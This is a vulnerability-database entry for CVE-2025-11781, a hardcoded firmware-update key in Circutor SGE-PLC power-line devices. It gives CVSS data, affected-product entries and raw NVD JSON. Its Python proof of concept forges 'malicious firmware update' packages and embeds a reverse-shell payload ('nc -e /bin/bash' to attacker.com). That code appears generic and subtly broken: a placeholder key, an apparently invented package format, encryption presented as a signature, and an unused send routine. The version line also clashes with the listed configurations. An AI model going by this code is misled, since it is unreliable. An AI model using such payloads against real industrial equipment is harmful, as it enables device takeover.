CVE-2025-11781

Description

Use of hardcoded cryptographic keys in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The affected firmware contains a hardcoded static authentication key. An attacker with local access to the device can extract this key (e.g., by analysing the firmware image or memory dump) and create valid firmware update packages. This bypasses all intended access controls and grants full administrative privileges.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:circutor:sge-plc1000_firmware:9.0.2:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:circutor:sge-plc1000:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:circutor:sge-plc50_firmware:9.0.2:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:circutor:sge-plc50:-:*:*:*:*:*:*:* - NOT VULNERABLE

Circutor SGE-PLC1000 < v9.0.2

Circutor SGE-PLC50 < v9.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-11781 PoC - Circutor SGE-PLC1000/SGE-PLC50 Hardcoded Key Extraction
This PoC demonstrates the vulnerability in firmware update authentication.
Note: This is for educational and authorized testing purposes only.
"""

import hashlib
import struct
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# Simulated hardcoded key extracted from firmware (for demonstration)
HARDCODED_KEY = bytes.fromhex('0123456789ABCDEF0123456789ABCDEF')

def create_malicious_firmware_update(target_ip, payload):
    """
    Create a malicious firmware update package using extracted hardcoded key.
    
    Args:
        target_ip: Target device IP address
        payload: Malicious payload to execute
    Returns:
        bytes: Malicious firmware update package
    """
    # Construct firmware header
    header = b'SGE_UPDATE'
    version = b'9.0.2'
    
    # Create firmware content with malicious payload
    firmware_content = pad(payload.encode(), 16)
    
    # Generate signature using hardcoded key (vulnerability)
    cipher = AES.new(HARDCODED_KEY, AES.MODE_ECB)
    signature = cipher.encrypt(firmware_content)
    
    # Construct update package
    update_package = (
        header +
        version +
        struct.pack('<I', len(firmware_content)) +
        firmware_content +
        signature
    )
    
    return update_package

def send_firmware_update(target_ip, update_package):
    """
    Send malicious firmware update to target device.
    
    Args:
        target_ip: Target device IP address
        update_package: Malicious update package
    Note: Requires valid network access to device
    """
    import socket
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, 8080))
        sock.send(update_package)
        response = sock.recv(1024)
        sock.close()
        return response
    except Exception as e:
        print(f"Error sending update: {e}")
        return None

if __name__ == '__main__':
    print("CVE-2025-11781 PoC - Circutor SGE-PLC Hardcoded Key Vulnerability")
    print("=" * 60)
    print("WARNING: This tool is for authorized security testing only.")
    print()
    
    # Example usage
    target = "192.168.1.100"
    malicious_payload = "reboot; nc -e /bin/bash attacker.com 4444"
    
    print(f"Target: {target}")
    print(f"Payload: {malicious_payload}")
    print()
    
    # Generate malicious update
    update = create_malicious_firmware_update(target, malicious_payload)
    print(f"Generated malicious update package: {len(update)} bytes")
    print(f"SHA256: {hashlib.sha256(update).hexdigest()}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11781
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11781
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11781/
[4] VulDB https://vuldb.com/cve/CVE-2025-11781
[5] https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11781", "sourceIdentifier": "[email protected]", "published": "2025-12-02T13:15:49.140", "lastModified": "2025-12-03T19:10:34.340", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Use of hardcoded cryptographic keys in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The affected firmware contains a hardcoded static authentication key. An attacker with local access to the device can extract this key (e.g., by analysing the firmware image or memory dump) and create valid firmware update packages. This bypasses all intended access controls and grants full administrative privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:circutor:sge-plc1000_firmware:9.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "3FC715A9-6F95-4795-B3B1-1BFAF88ACCE9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:circutor:sge-plc1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "FFF41215-1018-42DD-9A7E-BBC2E5B4522D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:circutor:sge-plc50_firmware:9.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "203C8B5E-582A-4680-B324-B9092F01462B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:circutor:sge-plc50:-:*:*:*:*:*:*:*", "matchCriteriaId": "447D1571-5329-422D-8E31-F4964E412FC3"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}